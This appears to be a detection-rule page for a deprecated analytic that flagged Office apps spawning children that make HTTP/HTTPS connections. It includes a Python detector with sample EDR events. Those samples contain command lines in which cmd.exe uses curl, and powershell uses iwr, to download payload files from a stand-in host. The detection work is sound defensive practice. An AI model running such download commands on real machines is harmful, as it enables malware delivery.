
Summary
This rule has been deprecated. It was designed to identify instances where Office applications, such as Word and Excel, spawn child processes that initiate network connections over HTTP or HTTPS. It used process-creation events from Endpoint Detection and Response (EDR) agents, looking specifically for child processes whose connections indicate potential malicious activity. Such a pattern can indicate the execution of living-off-the-land binaries (LOLBins) from a compromised Office document, which may lead to unauthorized code execution and data theft. The analytic was intended to strengthen detection of such threats in organizational environments.
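To make the described logic concrete, the following is an added example (not the deprecated rule's own search, and not from the page) that applies the same test to EDR process-creation records: an Office parent process and a child whose command line references an HTTP or HTTPS URL. The field names, the set of Office parents, and the sample events are all assumptions constructed for the illustration.

```python
import re
from typing import Iterable

# Office parent processes the analytic watched. Assumed list; the page does not enumerate them.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# An HTTP or HTTPS URL anywhere in the child's command line stands in for
# "initiates a network connection" here, since the page gives no field schema.
URL_PATTERN = re.compile(r"https?://", re.IGNORECASE)


def is_office_spawned_network_child(event: dict) -> bool:
    """True when an Office app spawned a child whose command line carries an HTTP(S) URL."""
    parent = event.get("parent_process_name", "").lower()
    cmdline = event.get("process_command_line", "")
    return parent in OFFICE_PARENTS and URL_PATTERN.search(cmdline) is not None


def find_matches(events: Iterable[dict]) -> list[dict]:
    """Return the subset of process-creation events that match the analytic."""
    return [e for e in events if is_office_spawned_network_child(e)]


# Constructed sample EDR process-creation events (not real telemetry).
# Only the first one should fire: Office parent plus an HTTPS URL in the child command line.
SAMPLE_EVENTS = [
    {"parent_process_name": "WINWORD.EXE", "process_name": "cmd.exe",
     "process_command_line": "cmd.exe /c curl https://example.invalid/update.bin -o %TEMP%\\u.bin"},
    # Office parent but no network indicator: a benign print-spooler helper.
    {"parent_process_name": "EXCEL.EXE", "process_name": "splwow64.exe",
     "process_command_line": "splwow64.exe 12288"},
    # URL present but the parent is not an Office application.
    {"parent_process_name": "explorer.exe", "process_name": "powershell.exe",
     "process_command_line": "powershell.exe -c iwr http://example.invalid/a.ps1"},
]

if __name__ == "__main__":
    for match in find_matches(SAMPLE_EVENTS):
        print(match["parent_process_name"], "->", match["process_command_line"])
```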
Categories
- Endpoint
- Windows
Data Sources
- Windows Registry
- Process
- Network Traffic
- Application Log
ATT&CK Techniques
- T1566
- T1566.001
Created: 2025-01-24